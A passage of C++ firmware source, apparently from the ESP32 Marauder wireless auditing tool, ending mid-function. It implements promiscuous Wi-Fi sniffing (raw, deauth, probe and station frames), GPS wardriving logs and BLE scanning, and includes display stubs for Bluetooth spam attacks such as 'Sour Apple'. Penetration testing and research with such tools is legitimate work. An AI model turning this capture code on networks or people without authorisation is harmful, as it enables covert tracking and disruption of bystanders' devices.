led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table1[59],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&stationSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
void WiFiScan::RunRawScan(uint8_t scan_mode, uint16_t color)
{
if (scan_mode != WIFI_SCAN_SIG_STREN)
startPcap("raw");
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_WHITE, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
if (scan_mode != WIFI_SCAN_SIG_STREN)
display_obj.tft.drawCentreString(text_table1[58],120,16,2);
else
display_obj.tft.drawCentreString("Signal Monitor", 120, 16, 2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&rawSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
void WiFiScan::RunDeauthScan(uint8_t scan_mode, uint16_t color)
{
startPcap("deauth");
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[39],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_RED, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&deauthSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
// Function for running probe request scan
void WiFiScan::RunProbeScan(uint8_t scan_mode, uint16_t color)
{
if (scan_mode == WIFI_SCAN_PROBE)
startPcap("probe");
else if (scan_mode == WIFI_SCAN_STATION_WAR_DRIVE) {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
startLog("station_wardrive");
String header_line = "WigleWifi-1.4,appRelease=" + (String)MARAUDER_VERSION + ",model=ESP32 Marauder,release=" + (String)MARAUDER_VERSION + ",device=ESP32 Marauder,display=SPI TFT,board=ESP32 Marauder,brand=JustCallMeKoko\nMAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type\n";
buffer_obj.append(header_line);
} else {
return;
}
#else
return;
#endif
}
#ifdef MARAUDER_FLIPPER
flipper_led.sniffLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.sniffLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.sniffLED();
#else
led_obj.setMode(MODE_SNIFF);
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[40],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_wifi_set_promiscuous(true);
esp_wifi_set_promiscuous_filter(&filt);
esp_wifi_set_promiscuous_rx_cb(&probeSnifferCallback);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
this->wifi_initialized = true;
initTime = millis();
}
void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
#ifdef HAS_BT
/*NimBLEDevice::init("");
NimBLEServer *pServer = NimBLEDevice::createServer();
pAdvertising = pServer->getAdvertising();*/
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString("Sour Apple",120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
#endif
this->ble_initialized;
#endif
}
void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) {
#ifdef HAS_BT
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
if (scan_mode == BT_ATTACK_SWIFTPAIR_SPAM)
display_obj.tft.drawCentreString("Swiftpair Spam",120,16,2);
else if (scan_mode == BT_ATTACK_SPAM_ALL)
display_obj.tft.drawCentreString("BLE Spam All",120,16,2);
else if (scan_mode == BT_ATTACK_SAMSUNG_SPAM)
display_obj.tft.drawCentreString("BLE Spam Samsung",120,16,2);
else if (scan_mode == BT_ATTACK_GOOGLE_SPAM)
display_obj.tft.drawCentreString("BLE Spam Google",120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
#endif
this->ble_initialized;
#endif
}
// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
#ifdef HAS_BT
#ifdef HAS_SCREEN
display_obj.print_delay_1 = 50;
display_obj.print_delay_2 = 20;
#endif
if (scan_mode != BT_SCAN_WAR_DRIVE_CONT) {
NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE);
NimBLEDevice::setScanDuplicateCacheSize(200);
}
NimBLEDevice::init("");
pBLEScan = NimBLEDevice::getScan(); //create new scan
if (scan_mode == BT_SCAN_ALL)
{
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[41],120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanAllCallback(), false);
}
else if ((scan_mode == BT_SCAN_WAR_DRIVE) || (scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
if (scan_mode == BT_SCAN_WAR_DRIVE) {
startLog("bt_wardrive");
}
else if (scan_mode == BT_SCAN_WAR_DRIVE_CONT) {
startLog("bt_wardrive_cont");
}
String header_line = "WigleWifi-1.4,appRelease=" + (String)MARAUDER_VERSION + ",model=ESP32 Marauder,release=" + (String)MARAUDER_VERSION + ",device=ESP32 Marauder,display=SPI TFT,board=ESP32 Marauder,brand=JustCallMeKoko\nMAC,SSID,AuthMode,FirstSeen,Channel,RSSI,CurrentLatitude,CurrentLongitude,AltitudeMeters,AccuracyMeters,Type\n";
buffer_obj.append(header_line);
} else {
return;
}
#else
return;
#endif
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,240,16, color);
if (scan_mode == BT_SCAN_WAR_DRIVE)
display_obj.tft.drawCentreString("BT Wardrive",120,16,2);
else if (scan_mode == BT_SCAN_WAR_DRIVE_CONT)
display_obj.tft.drawCentreString("BT Wardrive Continuous",120,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
if (scan_mode != BT_SCAN_WAR_DRIVE_CONT)
pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanAllCallback(), false);
else
pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanAllCallback(), true);
}
else if (scan_mode == BT_SCAN_SKIMMERS)
{
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 160;
display_obj.tteBar = true;
display_obj.tft.fillScreen(TFT_DARKGREY);
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
display_obj.tft.fillRect(0,16,240,16, color);
display_obj.tft.drawCentreString(text_table4[42],120,16,2);
display_obj.twoPartDisplay(text_table4[43]);
display_obj.tft.setTextColor(TFT_BLACK, TFT_DARKGREY);
display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
#endif
pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanSkimmersCallback(), false);
}
pBLEScan->setActiveScan(true); //active scan uses more power, but get results faster
pBLEScan->setInterval(97);
pBLEScan->setWindow(37); // less or equal setInterval value
pBLEScan->setMaxResults(0);
pBLEScan->start(0, scanCompleteCB, false);
Serial.println("Started BLE Scan");
this->ble_initialized = true;
initTime = millis();
#endif
}
// Function that is called when BLE scan is completed
#ifdef HAS_BT
void WiFiScan::scanCompleteCB(BLEScanResults scanResults) {
printf("Scan complete!\n");
printf("Found %d devices\n", scanResults.getCount());
scanResults.dump();
} // scanCompleteCB
#endif
// Function to extract MAC addr from a packet at given offset
void WiFiScan::getMAC(char *addr, uint8_t* data, uint16_t offset) {
sprintf(addr, "%02x:%02x:%02x:%02x:%02x:%02x", data[offset+0], data[offset+1], data[offset+2], data[offset+3], data[offset+4], data[offset+5]);
}
void WiFiScan::pwnSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
String src = "";
String essid = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_SCREEN
int buf = display_obj.display_buffer->size();
#else
int buf = 0;
#endif
if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
{
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
src.concat(addr);
if (src == "de:ad:be:ef:de:ad") {
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
Serial.print(addr);
//display_string.concat(addr);
display_string.concat("CH: " + (String)snifferPacket->rx_ctrl.channel);
Serial.print(" ESSID: ");
display_string.concat(" -> ");
// Just grab the first 255 bytes of the pwnagotchi beacon
// because that is where the name is
//for (int i = 0; i < snifferPacket->payload[37]; i++)
for (int i = 0; i < len - 37; i++)
{
Serial.print((char)snifferPacket->payload[i + 38]);
//display_string.concat((char)snifferPacket->payload[i + 38]);
if (isAscii(snifferPacket->payload[i + 38]))
essid.concat((char)snifferPacket->payload[i + 38]);
else
Serial.println("Got non-ascii character: " + (String)(char)snifferPacket->payload[i + 38]);
}
//essid.concat("\": \"\"}}");
//Serial.println("\n" + (String)(snifferPacket->payload[37]) + " -> " + essid);
// Load json
//DynamicJsonBuffer jsonBuffer; // ArduinoJson v5
DynamicJsonDocument json(1024); // ArduinoJson v6
//JsonObject& json = jsonBuffer.parseObject(essid); // ArduinoJson v5
// ArduinoJson v6
if (deserializeJson(json, essid)) {
Serial.println("\nCould not parse Pwnagotchi json");
display_string.concat(essid);
}
else {
Serial.println("\nSuccessfully parsed json");
String json_output;
//json.printTo(json_output); // ArduinoJson v5
serializeJson(json, json_output); // ArduinoJson v6
Serial.println(json_output);
display_string.concat(json["name"].as<String>() + " pwnd: " + json["pwnd_tot"].as<String>());
}
int temp_len = display_string.length();
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
#ifdef HAS_SCREEN
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
buffer_obj.append(snifferPacket, len);
}
}
}
}
void WiFiScan::apSnifferCallbackFull(void* buf, wifi_promiscuous_pkt_type_t type) {
extern WiFiScan wifi_scan_obj;
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
String essid = "";
String bssid = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_SCREEN
int buf = display_obj.display_buffer->size();
#else
int buf = 0;
#endif
if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
{
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
bool in_list = false;
bool mac_match = true;
for (int i = 0; i < access_points->size(); i++) {
mac_match = true;
//Serial.print("Checking ");
//Serial.print(addr);
//Serial.println(" against " + (String)access_points->get(i).essid);
for (int x = 0; x < 6; x++) {
//Serial.println((String)snifferPacket->payload[x + 10] + " | " + (String)access_points->get(i).bssid[x]);
if (snifferPacket->payload[x + 10] != access_points->get(i).bssid[x]) {
mac_match = false;
//Serial.println("MACs do not match");
break;
}
}
if (mac_match) {
in_list = true;
break;
}
}
if (!in_list) {
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
Serial.print(addr);
//display_string.concat(addr);
//Serial.print(" ESSID: ");
//display_string.concat(" -> ");
//for (int i = 0; i < snifferPacket->payload[37]; i++)
//{
// Serial.print((char)snifferPacket->payload[i + 38]);
// display_string.concat((char)snifferPacket->payload[i + 38]);
// essid.concat((char)snifferPacket->payload[i + 38]);
//}
Serial.print(" ESSID: ");
if (snifferPacket->payload[37] <= 0)
display_string.concat(addr);
else {
for (int i = 0; i < snifferPacket->payload[37]; i++)
{
Serial.print((char)snifferPacket->payload[i + 38]);
display_string.concat((char)snifferPacket->payload[i + 38]);
essid.concat((char)snifferPacket->payload[i + 38]);
}
}
bssid.concat(addr);
int temp_len = display_string.length();
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
#ifdef HAS_SCREEN
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
if (essid == "") {
essid = bssid;
Serial.print(essid + " ");
}
//LinkedList<char> beacon = new LinkedList<char>();
/*AccessPoint ap = {essid,
snifferPacket->rx_ctrl.channel,
{snifferPacket->payload[10],
snifferPacket->payload[11],
snifferPacket->payload[12],
snifferPacket->payload[13],
snifferPacket->payload[14],
snifferPacket->payload[15]},
false,
NULL};*/
AccessPoint ap;
ap.essid = essid;
ap.channel = snifferPacket->rx_ctrl.channel;
ap.bssid[0] = snifferPacket->payload[10];
ap.bssid[1] = snifferPacket->payload[11];
ap.bssid[2] = snifferPacket->payload[12];
ap.bssid[3] = snifferPacket->payload[13];
ap.bssid[4] = snifferPacket->payload[14];
ap.bssid[5] = snifferPacket->payload[15];
ap.selected = false;
ap.stations = new LinkedList<uint8_t>();
ap.beacon = new LinkedList<char>();
//for (int i = 0; i < len; i++) {
// ap.beacon->add(snifferPacket->payload[i]);
//}
ap.beacon->add(snifferPacket->payload[34]);
ap.beacon->add(snifferPacket->payload[35]);
Serial.print("\nBeacon: ");
for (int i = 0; i < ap.beacon->size(); i++) {
char hexCar[4];
sprintf(hexCar, "%02X", ap.beacon->get(i));
Serial.print(hexCar);
if ((i + 1) % 16 == 0)
Serial.print("\n");
else
Serial.print(" ");
}
ap.rssi = snifferPacket->rx_ctrl.rssi;
access_points->add(ap);
Serial.print(access_points->size());
Serial.print(" ");
Serial.print(esp_get_free_heap_size());
Serial.println();
buffer_obj.append(snifferPacket, len);
}
}
}
}
void WiFiScan::apSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
extern WiFiScan wifi_scan_obj;
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
String essid = "";
String bssid = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_SCREEN
int buf = display_obj.display_buffer->size();
#else
int buf = 0;
#endif
if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
{
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
bool in_list = false;
bool mac_match = true;
for (int i = 0; i < access_points->size(); i++) {
mac_match = true;
//Serial.print("Checking ");
//Serial.print(addr);
//Serial.println(" against " + (String)access_points->get(i).essid);
for (int x = 0; x < 6; x++) {
//Serial.println((String)snifferPacket->payload[x + 10] + " | " + (String)access_points->get(i).bssid[x]);
if (snifferPacket->payload[x + 10] != access_points->get(i).bssid[x]) {
mac_match = false;
//Serial.println("MACs do not match");
break;
}
}
if (mac_match) {
in_list = true;
break;
}
}
if (!in_list) {
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
Serial.print(addr);
display_string.concat(addr);
Serial.print(" ESSID: ");
display_string.concat(" -> ");
for (int i = 0; i < snifferPacket->payload[37]; i++)
{
Serial.print((char)snifferPacket->payload[i + 38]);
display_string.concat((char)snifferPacket->payload[i + 38]);
essid.concat((char)snifferPacket->payload[i + 38]);
}
bssid.concat(addr);
int temp_len = display_string.length();
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
#ifdef HAS_SCREEN
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
if (essid == "") {
essid = bssid;
Serial.print(essid + " ");
}
AccessPoint ap = {essid,
snifferPacket->rx_ctrl.channel,
{snifferPacket->payload[10],
snifferPacket->payload[11],
snifferPacket->payload[12],
snifferPacket->payload[13],
snifferPacket->payload[14],
snifferPacket->payload[15]},
false,
NULL,
snifferPacket->rx_ctrl.rssi,
new LinkedList<uint8_t>()};
access_points->add(ap);
Serial.print(access_points->size());
Serial.print(" ");
Serial.print(esp_get_free_heap_size());
Serial.println();
buffer_obj.append(snifferPacket, len);
}
}
}
}
void WiFiScan::beaconSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
extern WiFiScan wifi_scan_obj;
#ifdef HAS_GPS
extern GpsInterface gps_obj;
extern EvilPortal evil_portal_obj;
#endif
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
String essid = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_SCREEN
int buff = display_obj.display_buffer->size();
#else
int buff = 0;
#endif
// It is a beacon
if ((snifferPacket->payload[0] == 0x80) && (buff == 0))
{
// Do signal strength stuff first
if (wifi_scan_obj.currentScanMode == WIFI_SCAN_SIG_STREN) {
bool found = false;
uint8_t targ_index = 0;
AccessPoint targ_ap;
// Check list of APs
for (int i = 0; i < access_points->size(); i++) {
if (access_points->get(i).selected) {
uint8_t addr[] = {snifferPacket->payload[10],
snifferPacket->payload[11],
snifferPacket->payload[12],
snifferPacket->payload[13],
snifferPacket->payload[14],
snifferPacket->payload[15]};
// Compare AP bssid to ssid of recvd packet
for (int x = 0; x < 6; x++) {
if (addr[x] != access_points->get(i).bssid[x]) {
found = false;
break;
}
else
found = true;
}
if (found) {
//Serial.println("Received beacon from " + access_points->get(i).essid + ". Checking RSSI...");
targ_ap = access_points->get(i);
targ_index = i;
break;
}
}
}
if (!found)
return;
if ((targ_ap.rssi + 5 < snifferPacket->rx_ctrl.rssi) || (snifferPacket->rx_ctrl.rssi + 5 < targ_ap.rssi)) {
targ_ap.rssi = snifferPacket->rx_ctrl.rssi;
access_points->set(targ_index, targ_ap);
Serial.println((String)access_points->get(targ_index).essid + " RSSI: " + (String)access_points->get(targ_index).rssi);
return;
}
}
else if (wifi_scan_obj.currentScanMode == WIFI_SCAN_AP) {
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
Serial.print(addr);
Serial.print(" ESSID: ");
if (snifferPacket->payload[37] <= 0)
display_string.concat(addr);
else {
for (int i = 0; i < snifferPacket->payload[37]; i++)
{
Serial.print((char)snifferPacket->payload[i + 38]);
display_string.concat((char)snifferPacket->payload[i + 38]);
}
}
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
buffer_obj.append(snifferPacket, len);
}
else if (wifi_scan_obj.currentScanMode == WIFI_SCAN_WAR_DRIVE) {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
bool do_save = false;
// Check if we've already seen this AP
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
if (wifi_scan_obj.seen_mac(reinterpret_cast<unsigned char*>(addr)))
return;
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
if (snifferPacket->payload[37] > 0) {
Serial.print(" ESSID: ");
for (int i = 0; i < snifferPacket->payload[37]; i++)
{
Serial.print((char)snifferPacket->payload[i + 38]);
display_string.concat((char)snifferPacket->payload[i + 38]);
essid.concat((char)snifferPacket->payload[i + 38]);
}
}
else {
Serial.print(" BSSID: ");
Serial.print(addr);
display_string.concat(addr);
}
if (gps_obj.getFixStatus()) {
do_save = true;
display_string.concat(" | Lt: " + gps_obj.getLat());
display_string.concat(" | Ln: " + gps_obj.getLon());
}
else
display_string.concat(" | GPS: No Fix");
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
wifi_scan_obj.save_mac(reinterpret_cast<unsigned char*>(addr));
int n = WiFi.scanNetworks(false, true, false, 110, wifi_scan_obj.set_channel);
if (do_save) {
if (n > 0) {
for (int i = 0; i < n; i++) {
Serial.printf("%-32.32s", WiFi.SSID(i).c_str());
Serial.print(" -> ");
Serial.println(wifi_scan_obj.security_int_to_string(WiFi.encryptionType(i)).c_str());
}
}
String wardrive_line = (String)addr + "," + essid + "," + wifi_scan_obj.security_int_to_string(snifferPacket->rx_ctrl.channel) + "," + gps_obj.getDatetime() + "," + (String)snifferPacket->rx_ctrl.channel + "," + (String)snifferPacket->rx_ctrl.rssi + "," + gps_obj.getLat() + "," + gps_obj.getLon() + "," + gps_obj.getAlt() + "," + gps_obj.getAccuracy() + ",WIFI";
Serial.println(wardrive_line);
//buffer_obj.append(wardrive_line);
}
}
#endif
}
}
}
}
void WiFiScan::stationSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type) {
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
String mac = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
}
char ap_addr[] = "00:00:00:00:00:00";
char dst_addr[] = "00:00:00:00:00:00";
int ap_index = 0;
// Check if frame has ap in list of APs and determine position
uint8_t frame_offset = 0;
int offsets[2] = {10, 4};
bool matched_ap = false;
bool ap_is_src = false;
bool mac_match = true;
for (int y = 0; y < 2; y++) {
for (int i = 0; i < access_points->size(); i++) {
mac_match = true;
for (int x = 0; x < 6; x++) {
//Serial.println((String)snifferPacket->payload[x + 10] + " | " + (String)access_points->get(i).bssid[x]);
if (snifferPacket->payload[x + offsets[y]] != access_points->get(i).bssid[x]) {
mac_match = false;
break;
}
}
if (mac_match) {
matched_ap = true;
if (offsets[y] == 10)
ap_is_src = true;
ap_index = i;
getMAC(ap_addr, snifferPacket->payload, offsets[y]);
break;
}
}
if (matched_ap)
break;
}
// If did not find ap from list in frame, drop frame
if (!matched_ap)
return;
else {
if (ap_is_src)
frame_offset = 4;
else
frame_offset = 10;
}
